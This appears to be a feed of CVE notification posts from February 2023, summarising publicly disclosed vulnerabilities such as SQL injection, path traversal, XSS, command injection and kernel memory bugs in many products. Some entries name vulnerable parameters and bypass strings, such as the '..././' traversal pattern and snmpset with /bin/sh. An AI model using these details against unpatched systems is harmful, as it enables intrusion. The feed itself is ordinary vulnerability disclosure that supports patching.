🚨 CVE-2023-1056A vulnerability was found in SourceCodester Doctors Appointment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /edoc/doctor/patient.php. The manipulation of the argument search12 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221821 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-27 13:29:48 |
🚨 CVE-2023-1058A vulnerability classified as critical has been found in SourceCodester Doctors Appointment System 1.0. This affects an unknown part of the file create-account.php. The manipulation of the argument newemail leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221823.🎖@cveNotify |
|
| 2023-02-27 13:29:47 |
🚨 CVE-2023-1059A vulnerability classified as critical was found in SourceCodester Doctors Appointment System 1.0. This vulnerability affects unknown code of the file /admin/doctors.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221824.🎖@cveNotify |
|
| 2023-02-27 13:29:46 |
🚨 CVE-2023-1061A vulnerability, which was classified as critical, has been found in SourceCodester Doctors Appointment System 1.0. This issue affects some unknown processing of the file /admin/edit-doc.php. The manipulation of the argument oldmail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221825 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-27 13:29:45 |
🚨 CVE-2023-1062A vulnerability, which was classified as critical, was found in SourceCodester Doctors Appointment System 1.0. Affected is an unknown function of the file /admin/add-new.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221826 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-27 13:29:41 |
🚨 CVE-2023-1063A vulnerability has been found in SourceCodester Doctors Appointment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/patient.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221827.🎖@cveNotify |
|
| 2023-02-27 13:29:40 |
🚨 CVE-2023-22636An unauthorized configuration download vulnerability in FortiWeb 6.3.6 through 6.3.21, 6.4.0 through 6.4.2 and 7.0.0 through 7.0.4 may allow a local attacker to access confidential configuration files via a crafted http request.🎖@cveNotify |
|
| 2023-02-27 13:29:39 |
🚨 CVE-2023-26609ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.🎖@cveNotify |
|
| 2023-02-27 13:29:38 |
🚨 CVE-2023-26257An issue was discovered in the Connected Vehicle Systems Alliance (COVESA; formerly GENIVI) dlt-daemon through 2.18.8. Dynamic memory is not released after it is allocated in dlt-control-common.c.🎖@cveNotify |
|
| 2023-02-27 11:29:37 |
🚨 CVE-2023-22636An unauthorized configuration download vulnerability in FortiWeb 6.3.6 through 6.3.21, 6.4.0 through 6.4.2 and 7.0.0 through 7.0.4 may allow a local attacker to access confidential configuration files via a crafted http request.🎖@cveNotify |
|
| 2023-02-27 11:29:36 |
🚨 CVE-2022-31405MV iDigital Clinic Enterprise (iDCE) 1.0 stores passwords in cleartext.🎖@cveNotify |
|
| 2023-02-27 07:29:59 |
🚨 CVE-2023-26257An issue was discovered in the Connected Vehicle Systems Alliance (COVESA; formerly GENIVI) dlt-daemon through 2.18.8. Dynamic memory is not released after it is allocated in dlt-control-common.c.🎖@cveNotify |
|
| 2023-02-27 07:29:58 |
🚨 CVE-2022-36231pdf_info 0.5.3 is vulnerable to Command Execution because the Ruby code uses backticks instead of Open3.🎖@cveNotify |
|
| 2023-02-27 07:29:57 |
🚨 CVE-2022-45544** DISPUTED ** Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role.🎖@cveNotify |
|
| 2023-02-27 07:29:55 |
🚨 CVE-2023-0795LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3488, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-27 07:29:53 |
🚨 CVE-2023-0796LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-27 07:29:52 |
🚨 CVE-2023-0797LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6921, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-27 07:29:51 |
🚨 CVE-2023-0798LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3400, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-27 07:29:50 |
🚨 CVE-2023-0799LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3701, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-27 07:29:49 |
🚨 CVE-2023-0800LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-27 07:29:48 |
🚨 CVE-2023-0801LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-27 07:29:46 |
🚨 CVE-2023-0802LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-27 07:29:45 |
🚨 CVE-2023-0803LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-27 07:29:44 |
🚨 CVE-2023-0804LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-27 07:29:43 |
🚨 CVE-2022-37032An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c.🎖@cveNotify |
|
| 2023-02-27 07:29:42 |
🚨 CVE-2023-26609ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.🎖@cveNotify |
|
| 2023-02-27 01:29:37 |
🚨 CVE-2023-26605In the Linux kernel 6.0.8, there is a use-after-free in inode_cgwb_move_to_attached in fs/fs-writeback.c, related to __list_del_entry_valid.🎖@cveNotify |
|
| 2023-02-27 01:29:36 |
🚨 CVE-2023-26606In the Linux kernel 6.0.8, there is a use-after-free in ntfs_trim_fs in fs/ntfs3/bitmap.c.🎖@cveNotify |
|
| 2023-02-27 01:29:35 |
🚨 CVE-2023-26607In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.🎖@cveNotify |
|
| 2023-02-26 22:29:36 |
🚨 CVE-2023-26602ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.🎖@cveNotify |
|
| 2023-02-26 18:29:37 |
🚨 CVE-2023-1047A vulnerability classified as critical was found in TechPowerUp RealTemp 3.7.0.0. This vulnerability affects unknown code in the library WinRing0x64.sys. The manipulation leads to improper initialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-221806 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-26 18:29:36 |
🚨 CVE-2023-1048A vulnerability, which was classified as critical, has been found in TechPowerUp Ryzen DRAM Calculator 1.2.0.5. This issue affects some unknown processing in the library WinRing0x64.sys. The manipulation leads to improper initialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221807.🎖@cveNotify |
|
| 2023-02-26 16:29:43 |
🚨 CVE-2023-1043A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-26 16:29:42 |
🚨 CVE-2023-1044A vulnerability was found in MuYuCMS 2.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /editor/index.php. The manipulation of the argument file_path leads to relative path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221803.🎖@cveNotify |
|
| 2023-02-26 16:29:41 |
🚨 CVE-2023-1045A vulnerability was found in MuYuCMS 2.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin.php/accessory/filesdel.html. The manipulation of the argument filedelur leads to relative path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221804.🎖@cveNotify |
|
| 2023-02-26 16:29:40 |
🚨 CVE-2023-1046A vulnerability classified as critical has been found in MuYuCMS 2.2. This affects an unknown part of the file /admin.php/update/getFile.html. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221805 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-26 16:29:38 |
🚨 CVE-2023-1047A vulnerability classified as critical was found in TechPowerUp RealTemp 3.7.0.0. This vulnerability affects unknown code in the library WinRing0x64.sys. The manipulation leads to improper initialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. VDB-221806 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-26 16:29:37 |
🚨 CVE-2023-1048A vulnerability, which was classified as critical, has been found in TechPowerUp Ryzen DRAM Calculator 1.2.0.5. This issue affects some unknown processing in the library WinRing0x64.sys. The manipulation leads to improper initialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221807.🎖@cveNotify |
|
| 2023-02-26 12:29:39 |
🚨 CVE-2019-25105A vulnerability, which was classified as problematic, was found in dro.pm. This affects an unknown part of the file web/fileman.php. The manipulation of the argument secret/key leads to cross site scripting. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The name of the patch is fa73c3a42bc5c246a1b8f815699ea241aef154bb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-221763.🎖@cveNotify |
|
| 2023-02-26 12:29:38 |
🚨 CVE-2021-3329Lack of proper validation in HCI Host stack initialization can cause a crash of the bluetooth stack🎖@cveNotify |
|
| 2023-02-26 00:29:53 |
🚨 CVE-2022-48362Zoho ManageEngine Desktop Central and Desktop Central MSP before 10.1.2137.2 allow directory traversal via computerName to AgentLogUploadServlet. A remote, authenticated attacker could upload arbitrary code that would be executed when Desktop Central is restarted. (The attacker could authenticate by exploiting CVE-2021-44515.)🎖@cveNotify |
|
| 2023-02-25 22:29:37 |
🚨 CVE-2023-26550A SQL injection vulnerability in BMC Control-M before 9.0.20.214 allows attackers to execute arbitrary SQL commands via the memname JSON field.🎖@cveNotify |
|
| 2023-02-25 13:29:39 |
🚨 CVE-2023-26314The mono package before 6.8.0.105+dfsg-3.3 for Debian allows arbitrary code execution because the application/x-ms-dos-executable MIME type is associated with an un-sandboxed Mono CLR interpreter.🎖@cveNotify |
|
| 2023-02-25 12:29:41 |
🚨 CVE-2022-2024OS Command Injection in GitHub repository gogs/gogs prior to 0.12.11.🎖@cveNotify |
|
| 2023-02-25 12:29:40 |
🚨 CVE-2023-1035A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been classified as critical. Affected is an unknown function of the file update_user.php. The manipulation of the argument user_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221784.🎖@cveNotify |
|
| 2023-02-25 12:29:39 |
🚨 CVE-2023-1007A vulnerability was found in Twister Antivirus 8.17. It has been declared as critical. This vulnerability affects unknown code in the library filmfd.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221740.🎖@cveNotify |
|
| 2023-02-25 12:29:38 |
🚨 CVE-2023-1008A vulnerability was found in Twister Antivirus 8.17. It has been rated as problematic. This issue affects some unknown processing in the library filmfd.sys of the component IoControlCode Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-221741 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-25 12:29:37 |
🚨 CVE-2023-25725HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31.🎖@cveNotify |
|
| 2023-02-25 07:30:18 |
🚨 CVE-2023-26545In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device.🎖@cveNotify |
|
| 2023-02-25 07:30:16 |
🚨 CVE-2023-0880Misinterpretation of Input in GitHub repository thorsten/phpmyfaq prior to 3.1.11.🎖@cveNotify |
|
| 2023-02-25 07:30:14 |
🚨 CVE-2023-0878Cross-site Scripting (XSS) - Generic in GitHub repository nuxt/framework prior to 3.2.1.🎖@cveNotify |
|
| 2023-02-25 07:30:12 |
🚨 CVE-2023-0879Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.12.🎖@cveNotify |
|
| 2023-02-25 07:30:10 |
🚨 CVE-2023-0877Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.🎖@cveNotify |
|
| 2023-02-25 07:30:07 |
🚨 CVE-2023-0821HashiCorp Nomad and Nomad Enterprise 1.2.15 up to 1.3.8, and 1.4.3 jobs using a maliciously compressed artifact stanza source can cause excessive disk usage. Fixed in 1.2.16, 1.3.9, and 1.4.4.🎖@cveNotify |
|
| 2023-02-25 07:30:05 |
🚨 CVE-2022-44299SiteServerCMS 7.1.3 sscms has a file read vulnerability.🎖@cveNotify |
|
| 2023-02-25 07:30:02 |
🚨 CVE-2022-27891Palantir Gotham included an unauthenticated endpoint that listed all active usernames on the stack with an active session. The affected services have been patched and automatically deployed to all Apollo-managed Gotham instances. It is highly recommended that customers upgrade all affected services to the latest version. This issue affects: Palantir Gotham versions prior to 103.30221005.0.🎖@cveNotify |
|
| 2023-02-25 07:30:00 |
🚨 CVE-2022-32477An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the FvbServicesRuntimeDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI runtime memory used for the command buffer. This attack can be mitigated by copying the firmware block services data to SMRAM before checking it.🎖@cveNotify |
|
| 2023-02-25 07:29:57 |
🚨 CVE-2022-32469An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the PnpSmm shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI runtime memory used for the command buffer. This attack can be mitigated by copying the firmware block services data to SMRAM before checking it.🎖@cveNotify |
|
| 2023-02-25 07:29:55 |
🚨 CVE-2022-32475An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the VariableRuntimeDxe shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This issue was fixed in the kernel, which also protected chipset and OEM chipset code.🎖@cveNotify |
|
| 2023-02-25 07:29:53 |
🚨 CVE-2022-3089Echelon SmartServer 2.2 with i.LON Vision 2.2 stores cleartext credentials in a file, which could allow an attacker to obtain cleartext usernames and passwords of the SmartServer. If the attacker obtains the file, then the credentials could be used to control the web user interface and file transfer protocol (FTP) server.🎖@cveNotify |
|
| 2023-02-25 07:29:51 |
🚨 CVE-2022-43929IBM Db2 for Linux, UNIX and Windows 11.1 and 11.5 may be vulnerable to a Denial of Service when executing a specially crafted 'Load' command. IBM X-Force ID: 241676.🎖@cveNotify |
|
| 2023-02-25 07:29:49 |
🚨 CVE-2022-43927IBM Db2 for Linux, UNIX and Windows 10.5, 11.1, and 11.5 is vulnerable to information Disclosure due to improper privilege management when a specially crafted table access is used. IBM X-Force ID: 241671.🎖@cveNotify |
|
| 2023-02-25 07:29:47 |
🚨 CVE-2023-24964IBM InfoSphere Information Server 11.7 could allow a local user to obtain sensitive information from a log files. IBM X-Force ID: 246463.🎖@cveNotify |
|
| 2023-02-25 07:29:45 |
🚨 CVE-2022-36775IBM Security Verify Access 10.0.0.0, 10.0.1.0, 10.0.2.0, 10.0.3.0, and10.0.4.0 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 233576.🎖@cveNotify |
|
| 2023-02-25 07:29:43 |
🚨 CVE-2023-1034Path Traversal: '\..\filename' in GitHub repository salesagility/suitecrm prior to 7.12.9.🎖@cveNotify |
|
| 2023-02-25 07:29:42 |
🚨 CVE-2023-26035ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.🎖@cveNotify |
|
| 2023-02-25 07:29:40 |
🚨 CVE-2023-26036ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via /web/index.php. By controlling $view, any local file ending in .php can be executed. This is supposed to be mitigated by calling detaintPath, however dentaintPath does not properly sandbox the path. This can be exploited by constructing paths like "..././", which get replaced by "../". This issue is patched in versions 1.36.33 and 1.37.33.🎖@cveNotify |
|
| 2023-02-25 07:29:38 |
🚨 CVE-2023-26037ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an SQL Injection. The minTime and maxTime request parameters are not properly validated and could be used execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33.🎖@cveNotify |
|
| 2023-02-25 00:29:43 |
🚨 CVE-2021-42392The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution.🎖@cveNotify |
|
| 2023-02-25 00:29:42 |
🚨 CVE-2021-34167Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php.🎖@cveNotify |
|
| 2023-02-25 00:29:39 |
🚨 CVE-2021-34248SQL injection vulnerability in sourcecodester mobile-shop-system-php-mysql 1.0 allows remote attackers to log in via crafterdstring in the email field of the log in page.🎖@cveNotify |
|
| 2023-02-25 00:29:38 |
🚨 CVE-2022-40675Some cryptographic issues in Fortinet FortiNAC versions 9.4.0 through 9.4.1, 9.2.0 through 9.2.7, 9.1.0 through 9.1.8, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an attacker to decrypt and forge protocol communication messages.🎖@cveNotify |
|
| 2023-02-25 00:29:37 |
🚨 CVE-2022-43954An insertion of sensitive information into log file vulnerability [CWE-532] in the FortiPortal management interface 7.0.0 through 7.0.2 may allow a remote authenticated attacker to read other devices' passwords in the audit log page.🎖@cveNotify |
|
| 2023-02-24 22:30:03 |
🚨 CVE-2022-31836The leafInfo.match() function in Beego v2.0.3 and below uses path.join() to deal with wildcardvalues which can lead to cross directory risk.🎖@cveNotify |
|
| 2023-02-24 22:30:02 |
🚨 CVE-2022-38376Multiple improper neutralization of input during web page generation ('Cross-site Scripting') vulnerabilities [CWE-79] in Fortinet FortiNAC portal UI before 9.4.1 allows an attacker to perform an XSS attack via crafted HTTP requests.🎖@cveNotify |
|
| 2023-02-24 22:30:00 |
🚨 CVE-2021-42756Multiple stack-based buffer overflow vulnerabilities [CWE-121] in the proxy daemon of FortiWeb 5.x all versions, 6.0.7 and below, 6.1.2 and below, 6.2.6 and below, 6.3.16 and below, 6.4 all versions may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests.🎖@cveNotify |
|
| 2023-02-24 22:29:59 |
🚨 CVE-2023-23781A stack-based buffer overflow vulnerability [CWE-121] in FortiWeb version 7.0.1 and below, 6.4 all versions, version 6.3.19 and below SAML server configuration may allow an authenticated attacker to achieve arbitrary code execution via specifically crafted XML files.🎖@cveNotify |
|
| 2023-02-24 22:29:58 |
🚨 CVE-2023-24238TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.🎖@cveNotify |
|
| 2023-02-24 22:29:57 |
🚨 CVE-2023-24236TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.🎖@cveNotify |
|
| 2023-02-24 22:29:56 |
🚨 CVE-2023-23780A stack-based buffer overflow in Fortinet FortiWeb version 7.0.0 through 7.0.1, Fortinet FortiWeb version 6.3.6 through 6.3.19, Fortinet FortiWeb 6.4 all versions allows attacker to escalation of privilege via specifically crafted HTTP requests.🎖@cveNotify |
|
| 2023-02-24 22:29:54 |
🚨 CVE-2023-22580Due to improper input filtering in the sequalize js library, can malicious queries lead to sensitive information disclosure.🎖@cveNotify |
|
| 2023-02-24 22:29:53 |
🚨 CVE-2023-22579Due to improper parameter filtering in the sequalize js library, can a attacker peform injection.🎖@cveNotify |
|
| 2023-02-24 22:29:52 |
🚨 CVE-2019-14206An Arbitrary File Deletion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to delete arbitrary files via the $REQUEST['adaptive-images-settings'] parameter in adaptive-images-script.php.🎖@cveNotify |
|
| 2023-02-24 22:29:50 |
🚨 CVE-2019-14799The FV Flowplayer Video Player plugin before 7.3.14.727 for WordPress allows email subscription XSS.🎖@cveNotify |
|
| 2023-02-24 22:29:49 |
🚨 CVE-2016-10878The wp-google-map-plugin plugin before 3.1.2 for WordPress has XSS.🎖@cveNotify |
|
| 2023-02-24 22:29:48 |
🚨 CVE-2023-24483A vulnerability has been identified that, if exploited, could result in a local user elevating their privilege level to NT AUTHORITY\SYSTEM on a Citrix Virtual Apps and Desktops Windows VDA.🎖@cveNotify |
|
| 2023-02-24 22:29:47 |
🚨 CVE-2023-22578Due to improper artibute filtering in the sequalize js library, can a attacker peform SQL injections.🎖@cveNotify |
|
| 2023-02-24 22:29:46 |
🚨 CVE-2016-10874The wp-database-backup plugin before 4.3.3 for WordPress has CSRF.🎖@cveNotify |
|
| 2023-02-24 22:29:45 |
🚨 CVE-2016-10875The wp-database-backup plugin before 4.3.1 for WordPress has XSS.🎖@cveNotify |
|
| 2023-02-24 22:29:44 |
🚨 CVE-2020-15778** DISPUTED ** scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."🎖@cveNotify |
|
| 2023-02-24 22:29:43 |
🚨 CVE-2019-14787The Tribulant Newsletters plugin before 4.6.19 for WordPress allows XSS via the wp-admin/admin-ajax.php?action=newsletters_load_new_editor contentarea parameter.🎖@cveNotify |
|
| 2023-02-24 22:29:42 |
🚨 CVE-2016-10873The wp-database-backup plugin before 4.3.3 for WordPress has XSS.🎖@cveNotify |
|
| 2023-02-24 22:29:41 |
🚨 CVE-2019-14683The codection "Import users from CSV with meta" plugin before 1.14.2.2 for WordPress allows wp-admin/admin-ajax.php?action=acui_delete_attachment CSRF.🎖@cveNotify |
|
| 2023-02-24 20:30:23 |
🚨 CVE-2023-23460Priority Web version 19.1.0.68, parameter manipulation on an unspecified end-point may allow authentication bypass.🎖@cveNotify |
|
| 2023-02-24 20:30:21 |
🚨 CVE-2022-47508Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos.🎖@cveNotify |
|
| 2023-02-24 20:30:20 |
🚨 CVE-2022-47507SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-24 20:30:18 |
🚨 CVE-2010-0442The bitsubstr function in backend/utils/adt/varbit.c in PostgreSQL 8.0.23, 8.1.11, and 8.3.8 allows remote authenticated users to cause a denial of service (daemon crash) or have unspecified other impact via vectors involving a negative integer in the third argument, as demonstrated by a SELECT statement that contains a call to the substring function for a bit string, related to an "overflow."🎖@cveNotify |
|
| 2023-02-24 20:30:16 |
🚨 CVE-2022-47506SolarWinds Platform was susceptible to the Directory Traversal Vulnerability. This vulnerability allows a local adversary with authenticated account access to edit the default configuration, enabling the execution of arbitrary commands.🎖@cveNotify |
|
| 2023-02-24 20:30:14 |
🚨 CVE-2015-5289Multiple stack-based buffer overflows in json parsing in PostgreSQL before 9.3.x before 9.3.10 and 9.4.x before 9.4.5 allow attackers to cause a denial of service (server crash) via unspecified vectors, which are not properly handled in (1) json or (2) jsonb values.🎖@cveNotify |
|
| 2023-02-24 20:30:13 |
🚨 CVE-2022-38111SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-24 20:30:11 |
🚨 CVE-2022-47504SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-24 20:30:09 |
🚨 CVE-2022-47503SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-02-24 20:30:08 |
🚨 CVE-2018-5332In the Linux kernel through 3.2, the rds_message_alloc_sgs() function does not validate a value that is used during DMA page allocation, leading to a heap-based out-of-bounds write (related to the rds_rdma_extra_size function in net/rds/rdma.c).🎖@cveNotify |
|
| 2023-02-24 20:30:06 |
🚨 CVE-2019-8956In the Linux Kernel before versions 4.20.8 and 4.19.21 a use-after-free error in the "sctp_sendmsg()" function (net/sctp/socket.c) when handling SCTP_SENDALL flag can be exploited to corrupt memory.🎖@cveNotify |
|
| 2023-02-24 20:30:05 |
🚨 CVE-2018-9568In sk_clone_lock of sock.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-113509306. References: Upstream kernel.🎖@cveNotify |
|
| 2023-02-24 20:30:04 |
🚨 CVE-2019-15927An issue was discovered in the Linux kernel before 4.20.2. An out-of-bounds access exists in the function build_audio_procunit in the file sound/usb/mixer.c.🎖@cveNotify |
|
| 2023-02-24 20:30:02 |
🚨 CVE-2017-17855kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars.🎖@cveNotify |
|
| 2023-02-24 20:30:01 |
🚨 CVE-2017-2636Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.🎖@cveNotify |
|
| 2023-02-24 20:30:00 |
🚨 CVE-2018-14619A flaw was found in the crypto subsystem of the Linux kernel before version kernel-4.15-rc4. The "null skcipher" was being dropped when each af_alg_ctx was freed instead of when the aead_tfm was freed. This can cause the null skcipher to be freed while it is still in use leading to a local user being able to crash the system or possibly escalate privileges.🎖@cveNotify |
|
